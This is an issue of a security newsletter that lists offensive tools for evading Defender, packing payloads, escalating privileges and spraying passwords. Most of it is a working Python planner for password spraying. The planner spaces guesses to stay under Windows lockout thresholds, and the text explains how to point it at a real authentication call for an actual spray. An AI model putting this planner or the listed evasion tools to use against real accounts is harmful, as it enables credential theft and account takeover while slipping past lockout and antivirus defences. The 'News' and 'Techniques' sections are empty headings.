Last Week in Security (LWiS) - 2022-01-31

pkexec Linux LPE (@jogibharat), .NET remoting (@codewhitesec), usernames from CUCM (@n00py1), Notepad++ persistence (@_RastaMouse), Mythic update (@its_a_feature_), modern password spraying (@SprocketSec), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-01-25 to 2022-01-31.

News

Techniques and Write-ups

Tools and Exploits

  • stratus-red-team is "Atomic Red Team™" for the cloud, allowing you to emulate offensive attack techniques in a granular and self-contained manner.
  • T.D.P. - Thread Description Poisoning uses the SetThreadDescription and GetThreadDescription functions to hide the payload from memory scanners.
  • CVE-2022-21882 is a win32k LPE that bypasses the patch for CVE-2021-1732.
  • NimGetSyscallStub gets fresh syscall stubs from a fresh copy of ntdll.dll. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500, or ParallelNimcalls.
  • DefenderStop is a C# project to stop the Defender service via token impersonation.
  • PurplePanda fetches resources from different cloud/SaaS applications, focusing on permissions, in order to identify privilege escalation paths and dangerous permissions in the cloud/SaaS configurations. Note that PurplePanda searches for privilege escalation paths both within a platform and across platforms.
  • NimPackt-v1 is a Nim-based packer for .NET (C#) executables and shellcode targeting Windows. It automatically wraps the payload in a Nim binary that is compiled through C to a native executable and is as such harder to detect and reverse engineer.
  • wholeaked is a file-sharing tool that allows you to find the responsible person in case of a leak. I could see this being useful for sending multiple copies of phishing documents and seeing which ones end up on VirusTotal or similar sites.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • hobbits is a multi-platform GUI for bit-based analysis, processing, and visualization. This reminds me of the 010 Editor and its templates.
  • spraycharles is a low and slow password spraying tool, designed to spray on an interval over a long period of time.
  • cent, or Community Edition Nuclei Templates, is a simple tool that allows you to organize all the Nuclei templates offered by the community in one place.
  • Frida HandBook is an amazing resource for all things binary instrumentation.
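"Low and slow" spraying, as in spraycharles above and the modern password spraying write-up mentioned at the top, comes down to one scheduling problem: never let any account's bad-password count reach the lockout threshold. The following is an added example, not code from spraycharles or from the Sprocket Security post, that builds such a schedule, replays it against the Windows lockout semantics to prove it is safe, and contrasts it with the common mistake of spacing rounds evenly without ever pausing for a full reset interval. The lockout values, user names, passwords and the stand-in directory used by the dry run are all constructed.

```python
"""Planning a low-and-slow password spray that stays under a lockout threshold.

Added example; not code from spraycharles or the Sprocket Security post named
above. The lockout values, user names, passwords and the 'directory' used by
the dry run are all constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable, Dict, List, Sequence, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    """The Windows lockout settings that matter for spraying (values are assumptions)."""
    threshold: int            # "Account lockout threshold": bad attempts before lockout
    reset_after: timedelta    # "Reset account lockout counter after": idle time that zeroes the count
    safety_margin: int = 1    # stay this many attempts below the threshold


Attempt = Tuple[datetime, str, str]   # (when, username, password)


def plan_spray(users: Sequence[str], passwords: Sequence[str], policy: LockoutPolicy,
               start: datetime, pace: timedelta = timedelta(seconds=5),
               slack: timedelta = timedelta(minutes=2)) -> List[Attempt]:
    """One password across all users per round, in batches small enough that no
    account reaches the threshold, with a full reset interval between batches."""
    per_batch = policy.threshold - policy.safety_margin
    if per_batch < 1:
        raise ValueError("safety margin leaves no room for any attempt")
    schedule: List[Attempt] = []
    t = start
    for i in range(0, len(passwords), per_batch):
        for password in passwords[i:i + per_batch]:
            for user in users:
                schedule.append((t, user, password))
                t += pace
        # The DC zeroes the bad-password count only after reset_after with no
        # failures, measured from the LAST failure, so the pause is counted from
        # the batch's final request, not from its first.
        t = schedule[-1][0] + policy.reset_after + slack
    return schedule


def naive_plan(users: Sequence[str], passwords: Sequence[str], policy: LockoutPolicy,
               start: datetime) -> List[Attempt]:
    """The common mistake: rounds spaced 'evenly' at reset_after / per_batch with no
    pause. Every gap is shorter than reset_after, so the counter never resets."""
    gap = policy.reset_after / (policy.threshold - policy.safety_margin)
    return [(start + gap * round_no, user, password)
            for round_no, password in enumerate(passwords) for user in users]


def max_counted_failures(schedule: Sequence[Attempt], policy: LockoutPolicy) -> Dict[str, int]:
    """Replay the plan with Windows reset semantics (every attempt assumed to fail)
    and return the peak bad-password count each account would reach."""
    by_user: Dict[str, List[datetime]] = {}
    for when, user, _ in schedule:
        by_user.setdefault(user, []).append(when)
    peaks: Dict[str, int] = {}
    for user, times in by_user.items():
        count, peak, last = 0, 0, None
        for when in sorted(times):
            if last is not None and when - last >= policy.reset_after:
                count = 0
            count += 1
            peak = max(peak, count)
            last = when
        peaks[user] = peak
    return peaks


def is_safe(schedule: Sequence[Attempt], policy: LockoutPolicy) -> bool:
    """True if no account would ever reach the lockout threshold."""
    return all(p < policy.threshold for p in max_counted_failures(schedule, policy).values())


def dry_run(schedule: Sequence[Attempt], try_login: Callable[[str, str], bool]) -> List[Tuple[str, str]]:
    """Walk the plan (sleeping between attempts is the caller's job) and collect
    valid pairs; an account is dropped from the spray once a password works."""
    found: List[Tuple[str, str]] = []
    done = set()
    for _, user, password in schedule:
        if user not in done and try_login(user, password):
            found.append((user, password))
            done.add(user)
    return found


# Constructed inputs.
USERS = ["alice", "bob", "carol"]
PASSWORDS = ["Winter2022!", "Password1", "Welcome1", "Company2022", "Spring2022!", "Summer2022!"]
POLICY = LockoutPolicy(threshold=5, reset_after=timedelta(minutes=30))
START = datetime(2022, 1, 31, 9, 0)
VALID_CREDS = {("bob", "Welcome1")}   # stand-in for the target directory

if __name__ == "__main__":
    plan = plan_spray(USERS, PASSWORDS, POLICY, START)
    for when, user, password in plan:
        print(f"{when:%H:%M:%S} {user:<6} {password}")
    print("safe:", is_safe(plan, POLICY), max_counted_failures(plan, POLICY))
    print("naive plan safe:", is_safe(naive_plan(USERS, PASSWORDS, POLICY, START), POLICY))
    print("hits:", dry_run(plan, lambda u, p: (u, p) in VALID_CREDS))
```

With a threshold of 5 and a 30-minute reset, the safe plan sprays four passwords against every account in under a minute, then waits 32 minutes before the next batch; the naive plan fires a round every 7.5 minutes and drives every account to six counted failures. Replace the lambda in the dry run with a real authentication call (and honour the timestamps) to turn the plan into an actual spray; the replay check is also a reasonable thing to run before handing a schedule to any spraying tool.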

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.